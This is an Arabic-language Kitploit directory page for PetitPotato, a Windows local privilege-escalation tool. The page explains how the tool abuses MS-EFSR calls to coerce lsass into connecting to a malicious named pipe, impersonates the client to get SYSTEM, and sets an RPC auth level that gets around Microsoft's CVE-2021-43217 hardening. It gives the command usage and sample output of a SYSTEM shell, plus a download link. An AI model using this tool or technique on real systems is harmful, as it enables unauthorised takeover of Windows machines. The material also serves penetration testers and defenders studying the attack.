Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
PetitPotato — تصعيد الامتيازات محليًا عبر PetitPotam (استغلال صلاحيات الانتحال). | Kitploit
أدوات/GitHubGitHub/wh0amitz/petitpotato
تصعيد الامتيازاتالاستغلالأدوات انتحال الشخصيةما بعد الاستغلالاختبار الاختراقالفريق الأحمر
GitHubwh0amitz/petitpotato

PetitPotato

تصعيد الامتيازات محليًا عبر PetitPotam (استغلال صلاحيات الانتحال).

عرض المستودع
46655منذ 3 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

PetitPotato

تصعيد الامتيازات المحلي عبر PetitPotam (إساءة استخدام امتيازات الانتحال).

الوصف

يستخدم PetitPotam بروتوكول MS-EFSR (نظام الملفات المشفرة عن بُعد)، وهو بروتوكول يُستخدم لتنفيذ عمليات الصيانة والإدارة على البيانات المشفرة المخزنة عن بُعد والتي يتم الوصول إليها عبر الشبكة. توجد سلسلة من واجهات برمجة التطبيقات المشابهة لواجهة EfsRpcOpenFileRaw في MS-EFSR. يظهر تركيب واجهة EfsRpcOpenFileRaw أدناه.

root@kitploit:~
long EfsRpcOpenFileRaw(
   [in] handle_t binding_h,
   [out] PEXIMPORT_CONTEXT_HANDLE* hContext,
   [in, string] wchar_t* FileName,
   [in] long Flags
 );

يمكن لهذه الواجهات تحديد مسار UNC عبر معامل FileName لفتح الكائنات المشفرة على الخادم للنسخ الاحتياطي أو الاستعادة. عندما يتم تحديد مسار بالتنسيق \\IP\C$، ستصل خدمة lsass.exe إلى \\IP\pipe\srvsvc بصلاحيات حساب NT AUTHORITY SYSTEM.

إذا تمكنا من استدعاء واجهة EfsRpcOpenFileRaw لإجبار الكمبيوتر المحلي على الاتصال بالأنبوب المحدد (named pipe) الخبيث الذي أنشأناه، فيمكننا عندها انتحال عملية عميل الأنبوب المحدد وفي النهاية الحصول على صلاحية SYSTEKM.

لكن الإصدارات القديمة من PetitPotam لا تعمل على الإصدارات الأحدث من Windows بسبب قيود التصحيحات ذات الصلة. ومع ذلك، فإن تعيين AuthnLevel إلى RPC_C_AUTHN_LEVEL_PKT_PRIVACY عبر RpcBindingSetAuthInfoW قبل استدعاء EFS يعمل على أحدث الأنظمة.

في ديسمبر 2021، أصدرت Microsoft تصحيحًا لثغرة أمنية مختلفة في EFSRPC: CVE-2021-43217. وكجزء من معالجة تلك المشكلة، نفذت Microsoft بعض إجراءات التحصين على اتصالات EFSRPC. على وجه الخصوص، يجب على عملاء EFSRPC استخدام RPC_C_AUTHN_LEVEL_PKT_PRIVACY عند استخدام EFSRPC. إذا فشل العميل في القيام بذلك، فسيتم رفض العميل ويتم إنشاء حدث تطبيق Windows.

في الوقت الحالي، يمكن للمشروع رفع الصلاحيات إلى SYSTEM بشكل مثالي على جميع إصدارات Windows (تم الاختبار على Windows 21H2 10.0.20348.1547).

الاستخدام

root@kitploit:~
PetitPotato.exe [EfsID] [Command]
  • EfsID: رقم واجهة برمجة التطبيقات MS-EFSR المراد استخدامها
  • Command: الأمر المراد تنفيذه

مثال

root@kitploit:~
C:\Users\Administrator\Desktop>PetitPotato.exe 3 cmd

[+] Malicious named pipe running on \\.\pipe\petit\pipe\srvsvc.
[+] Invoking EfsRpcQueryUsersOnFile with target path: \\localhost/pipe/petit\C$\wh0nqs.txt.
[+] The connection is successful.
[+] ImpersonateNamedPipeClient OK.
[+] OpenThreadToken OK.
[+] DuplicateTokenEx OK.
[+] CreateProcessAsUser OK.
Microsoft Windows [Version 10.0.20348.1547]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>

image-20221030165055659

الروابط

  • https://github.com/topotam/PetitPotam
  • https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/
  • https://itm4n.github.io/from-rpcview-to-petitpotam/
  • https://github.com/zcgonvh/EfsPotato/pull/5
تنزيل الأداة